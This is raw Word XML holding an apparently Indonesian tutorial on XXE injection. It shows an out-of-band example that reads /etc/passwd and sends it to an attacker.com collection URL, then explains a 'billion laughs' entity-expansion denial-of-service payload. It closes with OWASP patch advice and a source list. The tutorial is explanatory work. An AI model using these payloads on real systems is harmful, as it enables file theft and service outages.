          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Kita tahu isi dari %file adalah </w:t>
      </w:r>
      <w:r w:rsidR="009F0698" w:rsidRPr="00586D60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"file:///etc/passwd"</w:t>
      </w:r>
      <w:r w:rsidR="00586D60">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan ini akan dieksekusi. URL yang akan terbentuk akan menginclude content dari /etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="007E2334">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">seperti ini </w:t>
      </w:r>
      <w:r w:rsidR="007E2334" w:rsidRPr="007E2334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http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh</w:t>
      </w:r>
      <w:r w:rsidR="007E2334" w:rsidRPr="007E2334">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>...dan</w:t>
      </w:r>
      <w:r w:rsidR="007E2334">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> seterusnya.</w:t>
      </w:r>
      <w:r w:rsidR="005F289B">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terakhir, XML parser akan menjalankan </w:t>
      </w:r>
      <w:r w:rsidR="005F289B" w:rsidRPr="005F289B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send</w:t>
      </w:r>
      <w:r w:rsidR="005F289B">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF6FC7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">yang akan merequest ke URL yang sudah terbentuk tadi. </w:t>
      </w:r>
      <w:r w:rsidR="00C87318">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Untuk melihat konten dari /etc/passwd, penyerang hanya perlu melihat log requestnya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA3B15" w14:textId="77777777" w:rsidR="00364FB5" w:rsidRDefault="00364FB5" w:rsidP="00364FB5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</w:p>
    <w:p w14:paraId="236048F9" w14:textId="58DD2E0F" w:rsidR="00364FB5" w:rsidRDefault="00364FB5" w:rsidP="00364FB5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 xml:space="preserve">Terakhir saya ingin memberikan contoh serangan XXE yang bertujuan untuk melakukan sebuah DoS (Denial of Service). Sangat simple, contoh payloadnya seperti ini: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383CD9EE" w14:textId="11814932" w:rsidR="003025E7" w:rsidRDefault="003025E7" w:rsidP="00364FB5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</w:p>
    <w:p w14:paraId="27E1AC74" w14:textId="0123FC69" w:rsidR="003025E7" w:rsidRDefault="003025E7" w:rsidP="00364FB5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Fonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CD7C683" wp14:editId="6CE7513A">
            <wp:extent cx="5166798" cy="23297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366" cy="233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68D2" w14:textId="43E49206" w:rsidR="00C87318" w:rsidRPr="00C87318" w:rsidRDefault="003025E7" w:rsidP="0039278F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 xml:space="preserve">Jika anda sudah membaca sampai sejauh ini, tentunya anda akan langsung mengerti maksud dari payload ini. </w:t>
      </w:r>
      <w:r w:rsidR="00AB3F9D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Pertama-tama penyerang membuat root element bernama lolz, dan membuat banyak sekali entity yang bertujuan untuk memanggil entity lainnya secara berkali-kali. </w:t>
      </w:r>
      <w:r w:rsidR="00BC296B">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Setelah itu, penyerang mengeksekusi entity tersebut </w:t>
      </w:r>
      <w:r w:rsidR="00BC296B" w:rsidRPr="00BC296B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&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. Yang akan terjadi adalah saat </w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB" w:rsidRPr="00FA56CB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lol9</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> dieksekusi, </w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB" w:rsidRPr="00FA56CB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lol9</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> akan mengeksekusi </w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB" w:rsidRPr="00FA56CB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lol8</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang akan mengeksekusi </w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB" w:rsidRPr="00FA56CB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lol7</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang akan mengeksekusi </w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB" w:rsidRPr="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lol6</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan seterusnya secara berkali-kali. Akibatnya apa? Webserver overload karena request yang berlebihan dan terjadilah sebuah Denial of Servi</w:t>
      </w:r>
      <w:r w:rsidR="008921FA">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00FA56CB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidR="007C6E7D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jika dihitung-hitung, </w:t>
      </w:r>
      <w:r w:rsidR="003F0D41">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">payload ini akan mengeksekusi </w:t>
      </w:r>
      <m:oMath>
        <m:sSup>
          <m:sSupPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rStyle w:val="jsgrdq"/>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Helvetica"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSupPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rStyle w:val="jsgrdq"/>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Helvetica"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <m:t>10</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <w:rPr>
                <w:rStyle w:val="jsgrdq"/>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Helvetica"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <m:t>9</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
      </m:oMath>
      <w:r w:rsidR="003F0D41">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B0B20">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“lols”</w:t>
      </w:r>
      <w:r w:rsidR="00A43FC6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang memakan hampir tiga gigabyte memory.</w:t>
      </w:r>
      <w:r w:rsidR="00652FF7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A34A15" w14:textId="615DCDAF" w:rsidR="000719B0" w:rsidRDefault="000719B0" w:rsidP="00BA3C5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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</w:p>
    <w:p w14:paraId="66A8AC68" w14:textId="29BCB24D" w:rsidR="000719B0" w:rsidRDefault="00030BAA" w:rsidP="000719B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030BAA">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>How to patch XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47110C63" w14:textId="59D985C7" w:rsidR="00030BAA" w:rsidRDefault="00E11EAD" w:rsidP="002F0EB2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 xml:space="preserve">Menurut owasp.org, cara paling aman untuk mencegah XXE, adalah untuk mendisable DTD secara menyeluruh. Mengapa? </w:t>
      </w:r>
      <w:r w:rsidR="00965852">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Kita bisa lihat dari contoh-contoh serangan yang saya berikan,</w:t>
      </w:r>
      <w:r w:rsidR="00847942">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> baik in-band maupun out-of-ban</w:t>
      </w:r>
      <w:r w:rsidR="00F46A5E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00847942">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00965852">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> semua serangan XXE datang dari DTD yang dimanipulasi. </w:t>
      </w:r>
      <w:r w:rsidR="00963F55">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Oleh karena itu, sangatlah jelas DTD haruslah didisable secara menyeluruh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9D119" w14:textId="7E976267" w:rsidR="00EA48FD" w:rsidRDefault="00EA48FD" w:rsidP="002F0EB2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</w:p>
    <w:p w14:paraId="00A6E68B" w14:textId="1321F803" w:rsidR="008D75FB" w:rsidRPr="00416B25" w:rsidRDefault="00EA48FD" w:rsidP="002F0EB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve">Detailnya untuk mengepatch XXE pada C/C++, Java, dan lain-lain dapat dilihat di </w:t>
      </w:r>
      <w:r w:rsidR="008D75FB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sumber yang saya berikan</w:t>
      </w:r>
      <w:r w:rsidR="00133033">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> karena </w:t>
      </w:r>
      <w:r w:rsidR="00C04D4F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudah jelas dan sangat banyak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12461F" w14:textId="35345E4E" w:rsidR="009F12CB" w:rsidRDefault="008D75FB" w:rsidP="002F0EB2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sekian pembahasan </w:t>
      </w:r>
      <w:r w:rsidR="00E169EE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">singkat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">saya mengenai XXE, </w:t>
      </w:r>
      <w:r w:rsidR="00E169EE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>saya harap artikel ini dapat membantu anda dalam mengerti XXE lebih lagi. Untuk informasi yang lebih detail dan lengkap mengenai XXE, dapat dilihat melalui sumber-sumber yang saya berikan. Terima kasih.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689328E3" w14:textId="486EDE04" w:rsidR="0017580B" w:rsidRDefault="0017580B" w:rsidP="0017580B">
      <w:pPr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>Sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B02BAF" w14:textId="565FFE74" w:rsidR="00683F3F" w:rsidRDefault="00683F3F" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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 xml:space="preserve">How to patch XXE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00683F3F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13555A35" w14:textId="5FE1BA2D" w:rsidR="009A551C" w:rsidRDefault="00B61FCD" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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 xml:space="preserve">Perbedaan XML dan JSON: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C1CE1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://stackoverflow.com/questions/2620270/what-is-the-difference-between-json-and-xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A6DB1" w14:textId="64F2083F" w:rsidR="00B61FCD" w:rsidRDefault="00A706E7" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r w:rsidRPr="006C1CE1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://blog.zerobyte.id/2019/05/apa-itu-xxe-injection.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD80DB3" w14:textId="2E78155A" w:rsidR="00A706E7" w:rsidRDefault="00496304" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r w:rsidRPr="006C1CE1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E34FA" w14:textId="287454A5" w:rsidR="00496304" w:rsidRDefault="006C1CE1" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r w:rsidRPr="006C1CE1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FEB5F" w14:textId="7842C515" w:rsidR="006C1CE1" w:rsidRDefault="00E07587" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>In</w:t>
      </w:r>
      <w:r w:rsidR="009A1979">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="009A1979">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nd XXE: </w:t>
      </w:r>
      <w:r w:rsidR="006C1CE1" w:rsidRPr="006C1CE1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://jagskap.blogspot.com/2019/08/xml-external-entities-inband-part-ii.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF31FD" w14:textId="291DA628" w:rsidR="006C1CE1" w:rsidRDefault="00E07587" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-band XXE: </w:t>
      </w:r>
      <w:r w:rsidR="004B75B8" w:rsidRPr="004B75B8">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://jagskap.blogspot.com/2019/08/xml-external-entities-out-of-band-part.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21844CC6" w14:textId="65DE14BE" w:rsidR="004B75B8" w:rsidRDefault="009B061A" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r w:rsidRPr="00965852">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://www.w3schools.com/xml/xml_dtd_examples.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF67941" w14:textId="2BCD34D9" w:rsidR="009B061A" w:rsidRDefault="00965852" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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  <w:r w:rsidRPr="00965852">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/#:~:text=In%20the%20case%20of%20out,response%20from%20the%20web%20application.&amp;text=The%20following%20is%20an%20example,%2Dband%20(OOB)%20technique</w:t>
      </w:r>
      <w:r w:rsidR="009B061A" w:rsidRPr="009B061A">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFC4EE" w14:textId="582A8A0A" w:rsidR="00965852" w:rsidRPr="00B61FCD" w:rsidRDefault="00965852" w:rsidP="00B61FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965852">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
